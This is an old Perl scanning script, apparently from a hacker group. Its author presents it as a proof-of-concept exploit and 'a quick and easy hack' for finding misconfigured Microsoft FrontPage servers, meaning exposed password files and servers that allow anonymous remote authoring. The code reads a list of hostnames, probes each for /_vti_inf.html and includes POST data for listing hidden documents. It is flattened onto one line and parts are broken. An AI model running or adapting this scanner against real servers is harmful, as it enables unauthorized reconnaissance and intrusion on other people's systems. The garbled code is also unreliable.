#!/usr/bin/perl # Various checks on Frontpage servers # Written by bansh33 of r00tabega.com [bansh33@r00tabega.com] # www.r00tabega.com # --------------------------------------------------------------------------------------------------------------- # Everybody knows about the _vti_pvt password files, but # what about those misconfigured Frontpage servers that allow # remote login and authoring without a login and password? # This script will scan for both vulnerabilties. # Makes for a quick and easy hack. # Note: This script is merely a proof of concept exploit, as such, the code probably isn't very clean. # # Greetings to Siegesoft, attrition, eEye, w00w00, USSR Labs, ADM, el8, phedz, and others I forgot to mention. # # Greetz to all of r00tabega -- my clique for life: busdr1v3r, Griffon, ytcracker, dilusi0n, Axtrex # # propz to my mommy and daddy cuz they make me drink my milk # # Currently, this code *requires* Lynx. In a future version I may eliminate the dependency on it. # ------begin c0de------------------------------------------------------------------------------------------------ use Socket; $postdata = "method\=list\+documents\%3a3\%2e0\%2e2\%2e1706\&service\%5fname\=\&listHiddenDocs\=true\&listExplorerDocs\=true\&li stRecurse\=false\&listFiles\=true\&listFolders\=true\&listLinkInfo\=true\&listIncludeParent\=true\&listDerivedT\=false\&listBord ers\=false"; # This string of postdata usually works, but you may want to modify this. print "[Frontpage Smack by bansh33 of r00tabega]\n"; print "[ -www.r00tabega.com- ]\n\n"; if (!($ARGV[0])) { print "usage: ./frontpage.pl [file with hostnames to check]\n"; exit; } $filetoopen = $ARGV[0]; open(thefile,$filetoopen); @thefile = ; close(thefile); foreach $host (@thefile) { $serverIP = inet_aton($host); $serverAddr = sockaddr_in(80, $serverIP); $number = 0; print "\n\nChecking $host for the Frontpage configuration file:\n\n"; socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp')); gethostbyname($host) or print "No IP address"; if(!gethostbyname($host)) { print "Can't Resolve DNS/IP"; } else { if(connect(CLIENT, $serverAddr)) { send(CLIENT,"GET /_vti_inf.html HTTP/1.0\n\n",0); $check=; ($http,$code,$therest) = split(/ /,$check); if($code == 200) { print "Found Frontpage configuration file...\n"; } else { print "Cannot Find Frontpage configuration...\n"; } } } } print "Scan complete.\n";